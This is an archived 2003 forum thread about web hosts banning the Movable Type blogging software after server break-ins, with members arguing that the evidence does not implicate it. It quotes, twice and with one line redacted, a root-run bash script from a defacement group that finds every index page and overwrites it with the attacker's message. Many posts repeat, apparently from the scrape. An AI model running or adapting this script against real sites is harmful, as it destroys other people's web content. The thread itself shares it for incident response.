QUOTE
Just a note, it has now been bad. We will be removing it from our servers over the next few days.
Full Version: Movable Type being banned by ISP Myacen
Myacen, my ISP, just put up a notice on its support forums that it is banning Movable Type and erasing it from all users' directories. They don't explain why. Suggest you contact Myacen.
Weird to do this without stating a reason. One of my hosters, hostingmatters, recently banned GreyMatter scripts for new clients, citing a security flaw that allowed upload of php scripts through comments and resource issues (they allow existing accounts to stay if they do a script patch to close the comments hole). But hey, at least they stated *why* and offered alternatives.
If I were you, I'd demand an explanation of "why" from Myacen.
Cheers,
If I were you, I'd demand an explanation of "why" from Myacen.
Cheers,
Myacen banned it because of this post on the Cpanel forums :
http://forums.cpanel.net/showthread.php?s=...&threadid=12013
Can somebody in MT please verify the problem quick.
http://forums.cpanel.net/showthread.php?s=...&threadid=12013
Can somebody in MT please verify the problem quick.
What does the post say? I don't want to register just to read it.
If it's about posting malicious code in comments, the Sanitize feature of MT addresses this.
If it's about posting malicious code in comments, the Sanitize feature of MT addresses this.
Here's what I found at the CPanel forum:
The first post:
the next:
And the next:
And the next:
And here is what is being said by "Robert" the staffer at MyAcen. I suggest that MT contact them soonest!
Get aload of thsi customer service!:
and this:
The first post:
QUOTE
Warning - Watch For This Site.
Someone I know just had their server nailed by this.
http://www.crimeperfectz.hpg.com.br/bi0s/devastador
Watch out for this.
cPanel.net Support Ticket Number:
__________________
See http://forum.cpanelhosts.com for another support and How To forum.
If I was posting I could surpass bdraco in posts.
Someone I know just had their server nailed by this.
http://www.crimeperfectz.hpg.com.br/bi0s/devastador
Watch out for this.
cPanel.net Support Ticket Number:
__________________
See http://forum.cpanelhosts.com for another support and How To forum.
If I was posting I could surpass bdraco in posts.
the next:
QUOTE
Sorry, you are right of course, here is that page. It is a shell script actually. This thread http://forums.cpanel.net/showthread...&threadid=12014 is the result of this script. It's the exact errors we saw on another machine.
#!/bin/bash
# # # # # # # # # # # # # # # # # # # # # # # # # # # # ##
# ##
# Brazilians Intruders 0f Systens Team 2003 ##
# Contato: bi0s@mail.com ##
# irc.brasnet.org /j bi0sbr ##
# www.bi0s.kit.net ##
# Devastador de Server por OverKill_ ##
# ##
##################################################
########
procura_paginas() {
find /$DIR_LOG -name index.html >logs
find /$DIR_LOG -name index.htm >>logs
find /$DIR_LOG -name index.php >>logs
#find $DIR_LOG -name *wtmp* >>logs
LINHA=`wc logs |cut -c-7`
}
console() {
REMOVE CODE FOR SAFETY REASONS; echo "ok"
echo -n "==> Aguarde, procurando paginas.."
procura_paginas;
echo "encontrados $LINHA Paginas para Ownar"
sleep 5
echo -n "--> Colocando seu texto nas Paginas"
for log in `cat logs`
do
echo -n " -> in $log..."
cp $log $log.bak
echo $MY_TEXT >$log
echo "ok"
done
echo "Brazilians Intruders 0f Systens Ownz You. OverKill was Here | Contato: irc.brasnet.org /j bi0sbr"
echo "ok"
echo "((((( Agora é soh registra! )))))"
}
help() {
echo " Use: $0"
echo "Exemplo: $0 'BI0S Ownz'"
}
if [ `whoami` != "root" ]; then
echo "[S] Execute somente como root"
exit
fi
if [ "$2" = "" ]; then
DIR_LOG="./"
else
DIR_LOG=$2
fi
echo; echo ; echo "<<<<<<<<< BI0S Devastador de Server >>>>>>>>>>"
echo " ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^"
echo " www.bi0s.kit.net "
echo "e-mail: bi0s@mail.com irc.brasnet.org #bi0sbr"
echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
if [ "$1" = "" ]; then
help;
else
MY_TEXT="$1"
console;
fi
cPanel.net Support Ticket Number:
__________________
See http://forum.cpanelhosts.com for another support and How To forum.
If I was posting I could surpass bdraco in posts.
Last edited by dgbaker on 07-11-2003 at 10:28 PM
#!/bin/bash
# # # # # # # # # # # # # # # # # # # # # # # # # # # # ##
# ##
# Brazilians Intruders 0f Systens Team 2003 ##
# Contato: bi0s@mail.com ##
# irc.brasnet.org /j bi0sbr ##
# www.bi0s.kit.net ##
# Devastador de Server por OverKill_ ##
# ##
##################################################
########
procura_paginas() {
find /$DIR_LOG -name index.html >logs
find /$DIR_LOG -name index.htm >>logs
find /$DIR_LOG -name index.php >>logs
#find $DIR_LOG -name *wtmp* >>logs
LINHA=`wc logs |cut -c-7`
}
console() {
REMOVE CODE FOR SAFETY REASONS; echo "ok"
echo -n "==> Aguarde, procurando paginas.."
procura_paginas;
echo "encontrados $LINHA Paginas para Ownar"
sleep 5
echo -n "--> Colocando seu texto nas Paginas"
for log in `cat logs`
do
echo -n " -> in $log..."
cp $log $log.bak
echo $MY_TEXT >$log
echo "ok"
done
echo "Brazilians Intruders 0f Systens Ownz You. OverKill was Here | Contato: irc.brasnet.org /j bi0sbr"
echo "ok"
echo "((((( Agora é soh registra! )))))"
}
help() {
echo " Use: $0
echo "Exemplo: $0 'BI0S Ownz'"
}
if [ `whoami` != "root" ]; then
echo "[S] Execute somente como root"
exit
fi
if [ "$2" = "" ]; then
DIR_LOG="./"
else
DIR_LOG=$2
fi
echo; echo ; echo "<<<<<<<<< BI0S Devastador de Server >>>>>>>>>>"
echo " ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^"
echo " www.bi0s.kit.net "
echo "e-mail: bi0s@mail.com irc.brasnet.org #bi0sbr"
echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
if [ "$1" = "" ]; then
help;
else
MY_TEXT="$1"
console;
fi
cPanel.net Support Ticket Number:
__________________
See http://forum.cpanelhosts.com for another support and How To forum.
If I was posting I could surpass bdraco in posts.
Last edited by dgbaker on 07-11-2003 at 10:28 PM
And the next:
QUOTE
It was found out by going through bash_history.
Look for /root/mass2.sh /root/devastodor.sh
and hidden files /root/.devastador.sh.swp and /root/.devastador.sh.swo
cPanel.net Support Ticket Number:
__________________
See http://forum.cpanelhosts.com for another support and How To forum.
If I was posting I could surpass bdraco in posts.
Look for /root/mass2.sh /root/devastodor.sh
and hidden files /root/.devastador.sh.swp and /root/.devastador.sh.swo
cPanel.net Support Ticket Number:
__________________
See http://forum.cpanelhosts.com for another support and How To forum.
If I was posting I could surpass bdraco in posts.
And the next:
QUOTE
That is who hit us.
You can see he is proud of the hit here:
http://www.zone-h.org/en/defacement...r_defacer=BI0S/
You can see the top 2 domians are on our server.
Both sites had Movable Type on them as well.
cPanel.net Support Ticket Number:
__________________
Thanks,
James Taylor
You can see he is proud of the hit here:
http://www.zone-h.org/en/defacement...r_defacer=BI0S/
You can see the top 2 domians are on our server.
Both sites had Movable Type on them as well.
cPanel.net Support Ticket Number:
__________________
Thanks,
James Taylor
And here is what is being said by "Robert" the staffer at MyAcen. I suggest that MT contact them soonest!
QUOTE
It's lucky we are on top of things, cruise & brisbane had the ptrace hack on them. If the kernels were not updated regularly your data would be long gone.
I have since removed the files, and on the advise of nick he urges us to upgrade to phpsuexec asap. Moveable type was banned due to the above reason. People are getting in and executing shell based scripts somehow. No exact details have been found but most sites getting hacked are getting hacked via moveable type.
__________________
I have since removed the files, and on the advise of nick he urges us to upgrade to phpsuexec asap. Moveable type was banned due to the above reason. People are getting in and executing shell based scripts somehow. No exact details have been found but most sites getting hacked are getting hacked via moveable type.
__________________
Get aload of thsi customer service!:
QUOTE
And as always we provide information. The files won't be removed they will just redirect to a search engine when called.
It's a tough decision to ban a script but when security is an issue I would rather loose a couple of customers that are hell bent on moveable type then getting a whole machine taken out by a script flaw.
It's a tough decision to ban a script but when security is an issue I would rather loose a couple of customers that are hell bent on moveable type then getting a whole machine taken out by a script flaw.
and this:
So, they don't know for sure that it's MT, they just assume because the two users who got hacked were both using MT that it must be MT's fault??
I'm a Myacen customer and a MT user. Myacen have not assumed anything. They have taken the precaution to ban MT which COULD be the source of the problem and I agree with their decision. I would much rather know that they have taken steps to protect their customers than risk security.
If and when the exact source of the problems are determined I'm sure Myacen will consider lifting the ban (if MT is not the problem).
As for their customer service - I have had bad experiences with other hosts in the past who are clearly motivated by money and do not know the meaning of customer service and support. I for one am grateful that Myacen have always been upfront and honest and it's reassuring to know that they care more about security and protecting their customers rather than losing a few dollars on those existing (and potential) customers who will consider leaving over a banned script.
If and when the exact source of the problems are determined I'm sure Myacen will consider lifting the ban (if MT is not the problem).
As for their customer service - I have had bad experiences with other hosts in the past who are clearly motivated by money and do not know the meaning of customer service and support. I for one am grateful that Myacen have always been upfront and honest and it's reassuring to know that they care more about security and protecting their customers rather than losing a few dollars on those existing (and potential) customers who will consider leaving over a banned script.
I'd be more impressed with their current (and hopefully tentative) decision if they had found something in the web server logs. Finding a shell script in the history file says that the culprits had an interactive session, and provides no supporting evidence for the conclusion that they got in by exploiting a CGI script.
Speaking of which, do the web servers at this ISP actually run as the user whose home directory is /root? As in the user "root"? Sorry, but that piece of the evidence makes it look like someone cracked the machine in a way that is unlikely to have anything to do with CGI. Either that, or the folks running the site have an odd sense of humor when it comes to setting up customer environments.
I should note that I'm running MT on a chrooted Apache using mod_perl, and it couldn't run a shell script if it wanted to, because there aren't any shells (or any other binaries, for that matter) inside the chroot. The fact that this extremely limited environment doesn't impair MT's functionality suggests that the package is pretty well self-contained, and is quite likely one of the safer Perl scripts you could be running on your server.
The only external calls I see in a casual audit are to sendmail and imagemagick/netpbm, and they look pretty clean. Also optional.
Could it be MT? Sure. It could also be PHP, Cpanel, lousy passwords, or a hack to some completely unrelated daemon that's listening for incoming connections (telnet, ssh, pop3/imap, sendmail, etc).
Now, I suppose it's possible that they have a smoking gun that just hasn't been mentioned on that forum, or that they're withholding details to give the folks responsible a chance to fix the hole before it starts getting used more widely, but as presented here, it looks to me like they've jumped the gun by blaming MT.
Speaking of which, do the web servers at this ISP actually run as the user whose home directory is /root? As in the user "root"? Sorry, but that piece of the evidence makes it look like someone cracked the machine in a way that is unlikely to have anything to do with CGI. Either that, or the folks running the site have an odd sense of humor when it comes to setting up customer environments.
I should note that I'm running MT on a chrooted Apache using mod_perl, and it couldn't run a shell script if it wanted to, because there aren't any shells (or any other binaries, for that matter) inside the chroot. The fact that this extremely limited environment doesn't impair MT's functionality suggests that the package is pretty well self-contained, and is quite likely one of the safer Perl scripts you could be running on your server.
The only external calls I see in a casual audit are to sendmail and imagemagick/netpbm, and they look pretty clean. Also optional.
Could it be MT? Sure. It could also be PHP, Cpanel, lousy passwords, or a hack to some completely unrelated daemon that's listening for incoming connections (telnet, ssh, pop3/imap, sendmail, etc).
Now, I suppose it's possible that they have a smoking gun that just hasn't been mentioned on that forum, or that they're withholding details to give the folks responsible a chance to fix the hole before it starts getting used more widely, but as presented here, it looks to me like they've jumped the gun by blaming MT.
If anyone from Myacen wants to contact us to give us more information about the hack, and why they think Movable Type was responsible, we can be contacted through the contact form.
However, I think it's very important to note *this message* in the thread linked above, which was not quoted above (because it wasn't written yet, I think):
This is rather good evidence that the hack is not Movable Type-related. If anyone from Myacen or another host knows anything otherwise, email us. But banning software from a server without real knowledge of whether the software caused the vulnerability, *and* without emailing the creators of the software with more information, strikes me as fairly irresponsible. We've always been very responsive to security issues, but there's nothing we can do without more information.
However, I think it's very important to note *this message* in the thread linked above, which was not quoted above (because it wasn't written yet, I think):
QUOTE
After further investigating, 2 of the 3 domains haad movable type, the third did not.
This is rather good evidence that the hack is not Movable Type-related. If anyone from Myacen or another host knows anything otherwise, email us. But banning software from a server without real knowledge of whether the software caused the vulnerability, *and* without emailing the creators of the software with more information, strikes me as fairly irresponsible. We've always been very responsive to security issues, but there's nothing we can do without more information.
Just as an update to this thread, check the thread I started here. The quoted "2 out of 3 domains had Movable Type" comment came from my webhost, Excelwebhosting.com. I think one of my sites was one of the 2 MT installations that was hit. In any event, Excelwebhosting is banning MT as well.
Heavy sigh. The sad thing is that Excelwebhosting's service was fast and friendly. Uptime was tremendous, and ping times very good. So I'm sorry to have to leave them.
Heavy sigh. The sad thing is that Excelwebhosting's service was fast and friendly. Uptime was tremendous, and ping times very good. So I'm sorry to have to leave them.
FWIW, a former friend of mine who is an IT security professional spent time trying to find security holes in MT (out of his own natural curiousity more than any real concerns with MT).
He never found one. Or, at least, he hadn't by the time we stopped talking to one another.
He never found one. Or, at least, he hadn't by the time we stopped talking to one another.
I've been hacking Perl and running large Unix sites for fifteen years now, and I chose MT for my server for the same reason that I chose OpenBSD: they've nailed it down so I don't have to. It's very careful about how it writes to files and executes local binaries. So far, the only thing that I have even the tiniest quibble with is the way it searches for the netpbm packages, if you enable that functionality.
Even then, the only risk is from a local attacker with write privileges to one of the small list of directories searched, and anyone who can do that has already compromised the system in ways that make MT quite irrelevant. And in any case, you can explicitly specify a safe path to the tools and avoid the search.
I bring it up not as an example of poor coding on their part (it isn't), but rather to illustrate just how difficult it was to come up with even a potential, trivial hole in the system, and how easy it was to audit their code to rule out other common attacks.
Another simple reality check was searching the CERT and SANS security-alert archives. How many people use Movable Type? How many relevant security alerts can you find? Compare and contrast to other commonly-installed CGI scripts.
There is one very real weakness in MT's security model: plugins. I'm not saying that any of the existing ones are unsafe, simply that they could be unsafe, and should be examined carefully before use. All of the ones I've looked at so far are fine.
Even then, the only risk is from a local attacker with write privileges to one of the small list of directories searched, and anyone who can do that has already compromised the system in ways that make MT quite irrelevant. And in any case, you can explicitly specify a safe path to the tools and avoid the search.
I bring it up not as an example of poor coding on their part (it isn't), but rather to illustrate just how difficult it was to come up with even a potential, trivial hole in the system, and how easy it was to audit their code to rule out other common attacks.
Another simple reality check was searching the CERT and SANS security-alert archives. How many people use Movable Type? How many relevant security alerts can you find? Compare and contrast to other commonly-installed CGI scripts.
There is one very real weakness in MT's security model: plugins. I'm not saying that any of the existing ones are unsafe, simply that they could be unsafe, and should be examined carefully before use. All of the ones I've looked at so far are fine.
I'm use (well, trying to use) MT with berkeley db format because my host is on windows, and I'm having problems because it is considered insecure.
The big problem is having to have directories with read/write/delete access. My host just won't do it. Right now I have to go back every day and reset my permissions on the root, then delete index.htm and achives.html just to post to my blog.
Is MySQL a better solution, or am I at the whim of my host with that too? My current situation is pretty unworkable.
The big problem is having to have directories with read/write/delete access. My host just won't do it. Right now I have to go back every day and reset my permissions on the root, then delete index.htm and achives.html just to post to my blog.
Is MySQL a better solution, or am I at the whim of my host with that too? My current situation is pretty unworkable.
Your host is running IIS and thinks that MT is insecure?
That's the funniest thing I've heard in a while. Thanks for making my evening.
Oh, and you should consider finding a webhosting outfit which is running Apache (with SUExec enabled).
That's the funniest thing I've heard in a while. Thanks for making my evening.
Oh, and you should consider finding a webhosting outfit which is running Apache (with SUExec enabled).
Hello,
Sorry for our delay in responding to this thread. We have just signed up and I will be monitoring this forum as lots of our customers do use moveable type and I wish to investigate it further and if possible use it/test it.
Myacen currently has not inforced it's written ban (posted on our forums) on moveable type. We are re-investigating the issues and will be discussing it further.
Just thought i'd clear that up.
Sorry for our delay in responding to this thread. We have just signed up and I will be monitoring this forum as lots of our customers do use moveable type and I wish to investigate it further and if possible use it/test it.
Myacen currently has not inforced it's written ban (posted on our forums) on moveable type. We are re-investigating the issues and will be discussing it further.
Just thought i'd clear that up.
Thanks for coming here Carl to clear all of this up.
Yep, thanks for coming over. And taking the time to investigate this even more.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.